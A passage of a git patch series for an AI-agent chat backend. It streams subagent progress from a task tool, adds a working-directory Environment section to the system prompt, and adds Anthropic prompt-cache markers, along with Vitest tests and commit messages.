+    expect(args.model).toBe(subagentModelOverride);
+  });
+
+  it("throws when agent context is missing the `model` field", async () => {
+    const gen = taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: { sandbox: ctx.sandbox /* no model */ },
+    } as never) as AsyncGenerator<TaskToolOutput>;
+    await expect(gen.next()).rejects.toThrow(/model not initialized/i);
+  });
+
+  it("registers only the executor tool set on the inner streamText call", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never);
+    await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    );
     const args = vi.mocked(streamText).mock.calls[0]?.[0] as { tools: Record<string, unknown> };
-    const toolNames = Object.keys(args.tools).sort();
-    expect(toolNames).toEqual(["bash", "edit", "glob", "grep", "read", "write"]);
-    // Critical: NO task (recursion guard) and NO client-side tools.
-    expect(args.tools).not.toHaveProperty("task");
-    expect(args.tools).not.toHaveProperty("ask_user_question");
-    expect(args.tools).not.toHaveProperty("skill");
-    expect(args.tools).not.toHaveProperty("todo_write");
-    expect(args.tools).not.toHaveProperty("web_fetch");
+    expect(Object.keys(args.tools).sort()).toEqual([
+      "bash",
+      "edit",
+      "glob",
+      "grep",
+      "read",
+      "write",
+    ]);
   });
 
-  it("passes a non-empty prompt so the model has something to act on", async () => {
-    // Regression: a previous version called streamText with `messages: []`,
-    // which caused the AI SDK to throw NoOutputGeneratedError because zero
-    // steps were recorded — the model had a system prompt but no user turn
-    // to respond to. The subagent must receive an explicit user-side trigger.
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
-    await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never);
+  it("passes a non-empty prompt so the model has something to act on (NoOutputGeneratedError regression)", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never);
+    await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    );
     const args = vi.mocked(streamText).mock.calls[0]?.[0] as {
       prompt?: string;
       messages?: unknown[];
@@ -93,54 +190,46 @@ describe("taskTool.execute", () => {
     const hasMessages = Array.isArray(args.messages) && args.messages.length > 0;
     expect(hasPrompt || hasMessages).toBe(true);
   });
+});
 
-  it("inherits the parent's `model` from agent context when no subagentModel override is set", async () => {
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
-    await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never);
-    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
-    expect(args.model).toBe(mainModel);
+describe("taskTool.toModelOutput", () => {
+  it("returns 'Task completed.' when no `final` is present", () => {
+    const out = taskTool.toModelOutput!({ output: {} } as never);
+    expect(out).toEqual({ type: "text", value: "Task completed." });
   });
 
-  it("prefers `subagentModel` over `model` when both are set on the context", async () => {
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
-    await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: { ...ctx, subagentModel: subagentModelOverride },
+  it("extracts the last assistant text part from the transcript", () => {
+    const out = taskTool.toModelOutput!({
+      output: {
+        final: [
+          { role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] },
+          { role: "tool", content: [{ type: "tool-result" }] },
+          {
+            role: "assistant",
+            content: [
+              { type: "tool-call", toolName: "read" },
+              { type: "text", text: "Found 3 files." },
+            ],
+          },
+        ],
+      },
     } as never);
-    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
-    expect(args.model).toBe(subagentModelOverride);
+    expect(out).toEqual({ type: "text", value: "Found 3 files." });
   });
 
-  it("returns success:false when no assistant text is in the response", async () => {
-    vi.mocked(streamText).mockReturnValue({
-      fullStream: (async function* () {})(),
-      finishReason: Promise.resolve("stop"),
-      response: Promise.resolve({ messages: [] }),
+  it("handles a string-valued content directly", () => {
+    const out = taskTool.toModelOutput!({
+      output: { final: [{ role: "assistant", content: "plain text reply" }] },
     } as never);
-    const result = (await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never)) as { success: boolean; summary: string };
-    expect(result.success).toBe(false);
-    expect(result.summary).toMatch(/no.*assistant/i);
-  });
-
-  it("returns success:false with a descriptive error when streamText throws", async () => {
-    vi.mocked(streamText).mockImplementation(() => {
-      throw new Error("gateway down");
-    });
-    const result = (await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never)) as { success: boolean; error: string };
-    expect(result.success).toBe(false);
-    expect(result.error).toMatch(/gateway down/);
+    expect(out).toEqual({ type: "text", value: "plain text reply" });
   });
 
-  it("throws when agent context is missing the `model` field", async () => {
-    await expect(
-      taskTool.execute!({ task: "x", instructions: "y" }, {
-        experimental_context: { sandbox: ctx.sandbox /* no model */ },
-      } as never),
-    ).rejects.toThrow(/model not initialized/i);
+  it("falls back to 'Task completed.' when the last assistant message has no text parts", () => {
+    const out = taskTool.toModelOutput!({
+      output: {
+        final: [{ role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] }],
+      },
+    } as never);
+    expect(out).toEqual({ type: "text", value: "Task completed." });
   });
 });
diff --git a/lib/agent/tools/askUserQuestionTool.ts b/lib/agent/tools/askUserQuestionTool.ts
index 8d5e1f4ed..1e15b27f4 100644
--- a/lib/agent/tools/askUserQuestionTool.ts
+++ b/lib/agent/tools/askUserQuestionTool.ts
@@ -57,7 +57,7 @@ Usage notes:
   outputSchema: askUserQuestionOutputSchema,
   // NO execute: this is a client-side tool. streamText halts the run after
   // emitting the tool-call; the chat UI fulfills it asynchronously.
-  toModelOutput: output => {
+  toModelOutput: ({ output }) => {
     if (!output) {
       return { type: "text", value: "User did not respond to questions." };
     }
diff --git a/lib/agent/tools/taskTool.ts b/lib/agent/tools/taskTool.ts
index 83381d58f..270974fce 100644
--- a/lib/agent/tools/taskTool.ts
+++ b/lib/agent/tools/taskTool.ts
@@ -1,7 +1,8 @@
-import { streamText, stepCountIs, tool } from "ai";
+import { streamText, stepCountIs, tool, type LanguageModelUsage, type ModelMessage } from "ai";
 import { z } from "zod";
 import { buildSubagentTools } from "@/lib/agent/tools/buildSubagentTools";
 import { getSubagentModel } from "@/lib/agent/tools/getSubagentModel";
+import { sumLanguageModelUsage } from "@/lib/agent/messageMetadata/sumLanguageModelUsage";
 
 const SUBAGENT_STEP_LIMIT = 30;
 
@@ -20,6 +21,32 @@ const taskInputSchema = z.object({
     ),
 });
 
+const taskPendingToolCallSchema = z.object({
+  name: z.string(),
+  input: z.unknown(),
+});
+
+export type TaskPendingToolCall = z.infer<typeof taskPendingToolCallSchema>;
+
+/**
+ * Output schema mirrors open-agents' `taskOutputSchema`
+ * (`packages/agent/tools/task.ts`) so the chat UI can render the same
+ * live progress card and expandable subagent transcript when cut over
+ * to api's `/api/chat/workflow`. The `execute` is an async generator
+ * that yields multiple chunks during the subagent run; the AI SDK
+ * pipes each yield through `tool-output-available`.
+ */
+const taskOutputSchema = z.object({
+  pending: taskPendingToolCallSchema.optional(),
+  toolCallCount: z.number().int().nonnegative().optional(),
+  startedAt: z.number().int().nonnegative().optional(),
+  modelId: z.string().optional(),
+  final: z.custom<ModelMessage[]>().optional(),
+  usage: z.custom<LanguageModelUsage>().optional(),
+});
+
+export type TaskToolOutput = z.infer<typeof taskOutputSchema>;
+
 const SUBAGENT_SYSTEM_PROMPT = `You are a focused subagent invoked by a parent agent. Run autonomously — do not ask the user clarifying questions. Complete the delegated task using the tools you have, then return a concise summary of what you did.
 
 Constraints:
@@ -35,9 +62,11 @@ Constraints:
  * concise summary that the parent can incorporate.
  *
  * Slim port of open-agents' multi-type SUBAGENT_REGISTRY → single
- * generic subagent. Streaming progress isn't piped to the UI (the
- * parent sees one long-running tool call until completion); add an
- * async-generator execute later if live progress matters.
+ * generic subagent, but the live-progress streaming pattern is a
+ * faithful port: the execute is `async function*`, yielding
+ * `{pending, toolCallCount, usage, modelId, startedAt}` chunks
+ * throughout the subagent run and a final `{final: ModelMessage[], …}`
+ * chunk carrying the full subagent transcript for UI rendering.
  */
 export const taskTool = tool({
   description: `Launch a subagent to handle complex tasks autonomously.
@@ -66,57 +95,81 @@ IMPORTANT:
 - Include critical context (APIs, function names, file paths) in the instructions
 - The parent agent does not see the subagent's internal tool calls, only its final summary`,
   inputSchema: taskInputSchema,
-  execute: async ({ task, instructions }, { experimental_context, abortSignal }) => {
-    // Resolves to ctx.subagentModel ?? ctx.model, throwing if context
-    // wasn't populated by runAgentStep. Mirrors open-agents' task tool
-    // (`getSubagentModel(experimental_context, "task")`).
+  outputSchema: taskOutputSchema,
+  execute: async function* ({ task, instructions }, { experimental_context, abortSignal }) {
     const subagentModel = getSubagentModel(experimental_context, "task");
-
-    try {
-      // `prompt` (not `messages: []`) is required — the AI SDK records zero
-      // steps and throws NoOutputGeneratedError if the model has only a
-      // system prompt with no user turn. Mirrors open-agents' task tool.
-      const result = streamText({
-        model: subagentModel,
-        system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`,
-        prompt: "Complete this task and provide a summary of what you accomplished.",
-        tools: buildSubagentTools(),
-        stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT),
-        experimental_context,
-        abortSignal,
-      });
-
-      // Drain fullStream so the subagent actually runs to completion.
-      // Streaming progress back to the parent UI is not wired in this slim
-      // port — the parent sees one long-running tool call until the
-      // subagent finishes.
-      for await (const _part of result.fullStream) {
-        void _part;
-      }
-
-      const response = await result.response;
-      const lastAssistant = response.messages.findLast(m => m.role === "assistant");
-      const content = lastAssistant?.content;
-
-      let summary = "";
-      if (typeof content === "string") {
-        summary = content;
-      } else if (Array.isArray(content)) {
-        const lastText = content.findLast(p => p.type === "text");
-        if (lastText && "text" in lastText) summary = lastText.text;
+    const subagentModelId =
+      typeof subagentModel === "string"
+        ? subagentModel
+        : (subagentModel as { modelId?: string }).modelId;
+
+    // `prompt` (not `messages: []`) is required — the AI SDK records zero
+    // steps and throws NoOutputGeneratedError if the model has only a
+    // system prompt with no user turn. Mirrors open-agents' task tool.
+    const result = streamText({
+      model: subagentModel,
+      system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`,
+      prompt: "Complete this task and provide a summary of what you accomplished.",
+      tools: buildSubagentTools(),
+      stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT),
+      experimental_context,
+      abortSignal,
+    });
+
+    const startedAt = Date.now();
+    let toolCallCount = 0;
+    let pending: TaskPendingToolCall | undefined;
+    let usage: LanguageModelUsage | undefined;
+
+    // Emit an initial chunk so the UI can render elapsed time from a
+    // stable timestamp and show "Subagent · 0 tools · 0 tokens" before
+    // the first step finishes.
+    yield { toolCallCount, startedAt, modelId: subagentModelId };
+
+    for await (const part of result.fullStream) {
+      if (part.type === "tool-call") {
+        toolCallCount += 1;
+        pending = { name: part.toolName, input: part.input };
+        yield { pending, toolCallCount, usage, startedAt, modelId: subagentModelId };
       }
 
-      if (!summary) {
-        return {
-          success: false,
-          summary: "Subagent finished with no assistant text. The task may be incomplete.",
-        };
+      if (part.type === "finish-step") {
+        usage = sumLanguageModelUsage(usage, part.usage);
+        // Keep the last observed `pending` so task UIs don't flicker
+        // back to an initializing state between subagent steps.
+        yield { pending, toolCallCount, usage, startedAt, modelId: subagentModelId };
       }
-
-      return { success: true, summary };
-    } catch (error) {
-      const message = error instanceof Error ? error.message : String(error);
-      return { success: false, error: `Subagent failed: ${message}` };
     }
+
+    const response = await result.response;
+    const finalUsage = usage ?? (await result.totalUsage);
+    yield {
+      final: response.messages,
+      toolCallCount,
+      usage: finalUsage,
+      startedAt,
+      modelId: subagentModelId,
+    };
+  },
+  /**
+   * Extract the last assistant text from the subagent's transcript
+   * for inclusion in the parent agent's context. Mirrors open-agents'
+   * `toModelOutput` (`packages/agent/tools/task.ts`). Operates on the
+   * FINAL yielded chunk's `output.final`.
+   */
+  toModelOutput: ({ output }) => {
+    const messages = output?.final;
+    if (!messages) return { type: "text", value: "Task completed." };
+
+    const lastAssistant = messages.findLast(m => m.role === "assistant");
+    const content = lastAssistant?.content;
+    if (!content) return { type: "text", value: "Task completed." };
+
+    if (typeof content === "string") return { type: "text", value: content };
+
+    const lastTextPart = content.findLast(p => p.type === "text");
+    if (!lastTextPart) return { type: "text", value: "Task completed." };
+
+    return { type: "text", value: lastTextPart.text };
   },
 });

From f3b8954c530300b1462e193e76c256997abf8f2d Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 21:15:01 -0500
Subject: [PATCH 09/10] feat(chat-workflow): thread real cwd + currentBranch
 into system prompt (cutover Bundle A.7) (#597)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7)

Third open-agents → api cutover bundle. The handler hardcoded
`workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set
`currentBranch`, so the agent had no environment info in its system
prompt and had to run `pwd` / `git branch` on every turn.

Production verification (today, before this fix):
  agent: "My system prompt does not contain working directory or
         branch information."

After this fix the agent receives an Environment section + Current
branch line + cloud-sandbox checkpointing block — same shape as
open-agents (sandbox.recoupable.com) emits.

Changes:
- New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles
  environment section → Current branch → cloud-sandbox checkpointing
  → custom instructions, all conditional on inputs. Mirrors
  open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts).
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports
  open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}`
  placeholder substitution.
- `handleChatWorkflowStream`: connect the sandbox once for both skill
  discovery AND cwd/branch reading, then thread real values into
  `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On
  connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves
  today's behavior; tools surface real errors later when they
  reconnect).
- `runAgentStep`: build the system prompt via
  `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})`
  instead of using the static `agentCustomInstructions` directly.

Scope reduced from the original "A.7+9" bundle: dropped contextLimit
plumbing because it's a client-side display concern in open-agents,
not server-side model routing (verified via grep — open-agents'
server never reads context.contextLimit either).

Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring);
full suite 3121/3121 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(chat-workflow): drop currentBranch handling from system prompt

Per direction: branch is always `main` (the default branch) in api's
deployment topology, so the per-branch `Current branch: <name>` line
and cloud-sandbox checkpointing block don't add information today.
Strip the templating to keep the system prompt focused on what's
load-bearing (the Environment section indicating workspace-relative
paths).

- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of
  open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real
  per-session branch)
- Drop `currentBranch` from `buildAgentSystemPrompt` options +
  rendering
- Stop reading `sandbox.currentBranch` in handleChatWorkflowStream
  (the field stays on AgentContext.sandbox for type completeness;
  also consumed by createSandboxHandler unchanged)
- Remove branch-related test cases

Can be re-added later if/when meaningful per-session branches (e.g.
xx/abcdef12 generated branches) land.

Tests: 3119/3119 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call

Build failure on bf1e2451 — runAgentStep was still passing
`currentBranch: input.agentContext.sandbox.currentBranch` after
buildAgentSystemPrompt's option was removed. Stripping it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .../workflows/__tests__/runAgentStep.test.ts  | 22 ++++++++
 app/lib/workflows/runAgentStep.ts             | 12 ++++-
 .../__tests__/buildAgentSystemPrompt.test.ts  | 32 +++++++++++
 lib/chat/buildAgentSystemPrompt.ts            | 53 +++++++++++++++++++
 lib/chat/handleChatWorkflowStream.ts          | 22 ++++----
 5 files changed, 131 insertions(+), 10 deletions(-)
 create mode 100644 lib/chat/__tests__/buildAgentSystemPrompt.test.ts
 create mode 100644 lib/chat/buildAgentSystemPrompt.ts

diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts
index 429a37505..0d48f81f8 100644
--- a/app/lib/workflows/__tests__/runAgentStep.test.ts
+++ b/app/lib/workflows/__tests__/runAgentStep.test.ts
@@ -88,6 +88,28 @@ describe("runAgentStep", () => {
     expect(meta?.modelId).toBe("anthropic/claude-haiku-4.5");
   });
 
+  it("includes cwd from agentContext.sandbox in the system prompt", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({
+      ...baseInput,
+      agentContext: {
+        sandbox: {
+          state: { type: "vercel" },
+          workingDirectory: "/sandbox/mono",
+        },
+      },
+      writable: stream,
+    } as never);
+
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { system?: string };
+    expect(args.system).toMatch(/# Environment/);
+    expect(args.system).toMatch(/Working directory: \. \(workspace root\)/);
+    expect(args.system).toMatch(/workspace-relative paths/);
+  });
+
   it("the wired callback returns undefined for non-finish-step parts", async () => {
     const captured: unknown[] = [];
     vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 983bf4d7a..9d752e1a7 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -1,6 +1,7 @@
 import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai";
 import { gateway } from "@ai-sdk/gateway";
 import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
+import { buildAgentSystemPrompt } from "@/lib/chat/buildAgentSystemPrompt";
 import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext";
@@ -57,9 +58,18 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
     ...input.agentContext,
     model: callModel,
   };
+  // Build the system prompt with an Environment section, included
+  // whenever the sandbox reports a working directory (instead of the
+  // static `agentCustomInstructions` string alone). The literal cwd
+  // is not exposed to the model; the section tells it to use
+  // workspace-relative paths. Mirrors open-agents' `buildSystemPrompt`.
+  const systemPrompt = buildAgentSystemPrompt({
+    cwd: input.agentContext.sandbox.workingDirectory,
+    customInstructions: agentCustomInstructions,
+  });
   const result = streamText({
     model: callModel,
-    system: agentCustomInstructions,
+    system: systemPrompt,
     messages: modelMessages,
     tools,
     stopWhen: CHAT_AGENT_STOP_WHEN,
diff --git a/lib/chat/__tests__/buildAgentSystemPrompt.test.ts b/lib/chat/__tests__/buildAgentSystemPrompt.test.ts
new file mode 100644
index 000000000..81cb9268d
--- /dev/null
+++ b/lib/chat/__tests__/buildAgentSystemPrompt.test.ts
@@ -0,0 +1,32 @@
+import { describe, it, expect } from "vitest";
+import { buildAgentSystemPrompt } from "@/lib/chat/buildAgentSystemPrompt";
+
+describe("buildAgentSystemPrompt", () => {
+  it("emits only customInstructions when no cwd is provided", () => {
+    const prompt = buildAgentSystemPrompt({ customInstructions: "hello" });
+    expect(prompt).toBe("hello");
+    expect(prompt).not.toMatch(/Working directory/);
+  });
+  // The section text is static: it names "." rather than the cwd value passed in.
+  it("includes an Environment section when cwd is provided", () => {
+    const prompt = buildAgentSystemPrompt({ cwd: "/vercel/sandbox" });
+    expect(prompt).toMatch(/# Environment/);
+    expect(prompt).toMatch(/Working directory: \. \(workspace root\)/);
+    expect(prompt).toMatch(/workspace-relative paths/);
+  });
+  // Ordering check: the custom-instructions marker must sit after the section header.
+  it("appends customInstructions AFTER the environment section", () => {
+    const prompt = buildAgentSystemPrompt({
+      cwd: "/sandbox",
+      customInstructions: "MARK_AT_END",
+    });
+    const envIdx = prompt.indexOf("# Environment");
+    const customIdx = prompt.indexOf("MARK_AT_END");
+    expect(envIdx).toBeGreaterThanOrEqual(0);
+    expect(customIdx).toBeGreaterThan(envIdx);
+  });
+  // With neither option set, no section is rendered at all.
+  it("returns empty string when all options are empty", () => {
+    expect(buildAgentSystemPrompt({})).toBe("");
+  });
+});
diff --git a/lib/chat/buildAgentSystemPrompt.ts b/lib/chat/buildAgentSystemPrompt.ts
new file mode 100644
index 000000000..922273ae7
--- /dev/null
+++ b/lib/chat/buildAgentSystemPrompt.ts
@@ -0,0 +1,53 @@
+const ENVIRONMENT_SECTION = `# Environment
+
+Working directory: . (workspace root)
+Use workspace-relative paths for all file operations.`; // Static text: no path is interpolated.
+
+export type BuildAgentSystemPromptOptions = {
+  /**
+   * Sandbox working directory. Any non-empty value triggers inclusion
+   * of the Environment section; the literal path isn't exposed to the
+   * model — the section just signals "you're in a workspace; use
+   * relative paths" (mirrors open-agents).
+   */
+  cwd?: string;
+  /**
+   * Project-specific custom instructions appended at the end of the
+   * prompt (api's existing `agentCustomInstructions` — assistant file
+   * link prompt + recoup-api skill prompt). Skipped when empty.
+   */
+  customInstructions?: string;
+};
+
+/**
+ * Assemble the system prompt for `runAgentStep`. Mirrors open-agents'
+ * `buildSystemPrompt` (`packages/agent/system-prompt.ts`) at the
+ * structural level — environment section → custom instructions — so
+ * the agent knows it's in a sandboxed workspace without having to
+ * run `pwd` on every prompt.
+ *
+ * Each section renders only when its option is truthy (an empty
+ * string counts as absent), so a request without sandbox context (or
+ * before sandbox boot) still gets a coherent env-less prompt.
+ *
+ * `currentBranch` handling deliberately omitted in this slim port —
+ * the cloud-sandbox checkpointing block in open-agents templates a
+ * `git push -u origin {branch}` example per session, but in api's
+ * deployment topology the branch is always the org repo's default
+ * (`main`), so the per-branch templating doesn't add value yet. Add
+ * back when a meaningful per-session branch lands (e.g. xx/abcdef12
+ * generated branches).
+ */
+export function buildAgentSystemPrompt(options: BuildAgentSystemPromptOptions): string {
+  const parts: string[] = [];
+  // `cwd` is only a presence flag; the section text itself is static.
+  if (options.cwd) {
+    parts.push(ENVIRONMENT_SECTION);
+  }
+  // Custom instructions always come last, after any environment section.
+  if (options.customInstructions) {
+    parts.push(options.customInstructions);
+  }
+  // Sections are joined by one blank line; no sections yields "".
+  return parts.join("\n\n");
+}
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index 818c70f8c..5a1c89603 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -94,18 +94,25 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
     ? (extractOrgId(session.clone_url) ?? undefined)
     : undefined;
 
-  // Connect the sandbox up-front so we can discover project-level skills
-  // before starting the workflow. The connected handle isn't passed into
-  // the workflow (it's not durably serializable) — only `sandbox.state`
-  // is. Tools reconnect via `connectVercel(state)` inside `"use step"`.
+  // Connect the sandbox up-front so we can (a) read the real working
+  // directory and (b) discover project-level skills. The connected
+  // handle isn't passed into the workflow (it's not durably
+  // serializable) — only `sandbox.state` is. Tools reconnect via
+  // `connectVercel(state)` inside `"use step"`.
+  //
+  // If connection fails we fall back to the default working directory
+  // so the workflow can still start — tools will surface the
+  // underlying failure when they try to reconnect.
   let skills: Awaited<ReturnType<typeof discoverSkills>> = [];
+  let workingDirectory: string = DEFAULT_WORKING_DIRECTORY;
   try {
     const sandbox = await connectVercel(session.sandbox_state as VercelState);
+    workingDirectory = sandbox.workingDirectory;
     const dirs = await getSandboxSkillDirectories(sandbox);
     skills = await discoverSkills(sandbox, dirs);
   } catch (error) {
     console.error(
-      "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:",
+      "[handleChatWorkflowStream] sandbox connect / skill discovery failed; continuing with defaults:",
       error,
     );
   }
@@ -119,10 +126,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
       agentContext: {
         sandbox: {
           state: session.sandbox_state as VercelState,
-          // Slim PR 4 ships the default working directory. Per-session
-          // overrides land when createChatRuntime is ported alongside
-          // the rest of the tool surface.
-          workingDirectory: DEFAULT_WORKING_DIRECTORY,
+          workingDirectory,
         },
         recoupOrgId,
         skills,

From cbcabcced0f641ca8241808fcca3176354a36fd8 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 21:46:37 -0500
Subject: [PATCH 10/10] feat(chat-workflow): Anthropic prompt cache control
 (Bundle A.6) (#599)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Fourth open-agents → api cutover bundle. runAgentStep was sending the
same system prompt + tool definitions on every turn as fresh input,
even though Anthropic prompt caching can shave 90% off subsequent
input cost. Production traces showed `cacheReadTokens: 0` on every
api turn, while open-agents shows cacheRead matching cacheWrite from
the prior turn — i.e. open-agents reuses the cached prefix.

Changes (SRP — one function per file):
- `lib/agent/contextManagement/isAnthropicModel.ts` — predicate
  port of open-agents'
  `packages/agent/context-management/cache-control.ts:5`.
- `lib/agent/contextManagement/addCacheControlToTools.ts` — marks
  the LAST tool with `cacheControl: { type: "ephemeral" }`. Marking
  only the last tool uses one of Anthropic's 4 cache breakpoints.
- `lib/agent/contextManagement/addCacheControlToMessages.ts` —
  marks the LAST message with `cacheControl` on every step, per
  Anthropic's "mark the final block of the final message" guidance.

`runAgentStep` now:
- Wraps the tool set via `addCacheControlToTools(...)` before passing
  to streamText (static — set once per step).
- Adds a `prepareStep` callback that wraps `messages` via
  `addCacheControlToMessages(...)` on every internal model call.

Production behavior reproducer (Haiku 4.5, identical 2-turn prompt
to both backends):
  api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952
                     turn2 cacheWrite=0 cacheRead=0 cost=$0.005959
                     → flat cost; full input billed every turn.
  open-agents prod:  turn1 cacheWrite=10966 cacheRead=0
                     turn2 cacheWrite=12    cacheRead=10966 cost drops 12x
                     → near-full prefix re-read from cache on turn 2.

After this PR, api should match open-agents' caching curve.

Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5
addCacheControlToMessages + 2 runAgentStep wiring assertions); full
suite 3138/3138 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .../workflows/__tests__/runAgentStep.test.ts  | 53 ++++++++++++++++
 app/lib/workflows/runAgentStep.ts             | 17 ++++-
 .../addCacheControlToMessages.test.ts         | 60 ++++++++++++++++++
 .../__tests__/addCacheControlToTools.test.ts  | 63 +++++++++++++++++++
 .../__tests__/isAnthropicModel.test.ts        | 36 +++++++++++
 .../addCacheControlToMessages.ts              | 44 +++++++++++++
 .../addCacheControlToTools.ts                 | 50 +++++++++++++++
 .../contextManagement/isAnthropicModel.ts     | 26 ++++++++
 8 files changed, 348 insertions(+), 1 deletion(-)
 create mode 100644 lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts
 create mode 100644 lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts
 create mode 100644 lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts
 create mode 100644 lib/agent/contextManagement/addCacheControlToMessages.ts
 create mode 100644 lib/agent/contextManagement/addCacheControlToTools.ts
 create mode 100644 lib/agent/contextManagement/isAnthropicModel.ts

diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts
index 0d48f81f8..b2e90475b 100644
--- a/app/lib/workflows/__tests__/runAgentStep.test.ts
+++ b/app/lib/workflows/__tests__/runAgentStep.test.ts
@@ -110,6 +110,59 @@ describe("runAgentStep", () => {
     expect(args.system).toMatch(/workspace-relative paths/);
   });
 
+  it("wraps tools with anthropic cacheControl on the last tool before passing to streamText", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+    // baseInput is defined outside this hunk — presumably it selects an Anthropic model; confirm.
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+    // "Last" below means last in Object.keys order of the tools given to streamText.
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as {
+      tools: Record<
+        string,
+        { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }
+      >;
+    };
+    const toolNames = Object.keys(args.tools);
+    expect(toolNames.length).toBeGreaterThan(0);
+    const lastTool = args.tools[toolNames[toolNames.length - 1]!]!;
+    expect(lastTool.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" });
+    // Earlier tools should NOT carry the cache-control marker (Anthropic 4-breakpoint limit).
+    if (toolNames.length > 1) {
+      expect(args.tools[toolNames[0]!]?.providerOptions).toBeUndefined();
+    }
+  });
+
+  it("wires a prepareStep callback that marks the last message with cacheControl", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+    // prepareStep is read off the captured streamText options and invoked by hand below.
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as {
+      prepareStep?: (opts: {
+        messages: Array<{ role: string; providerOptions?: Record<string, unknown> }>;
+        model: unknown;
+        steps?: unknown[];
+      }) => { messages?: unknown[] } | undefined;
+    };
+    expect(typeof args.prepareStep).toBe("function");
+    const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never;
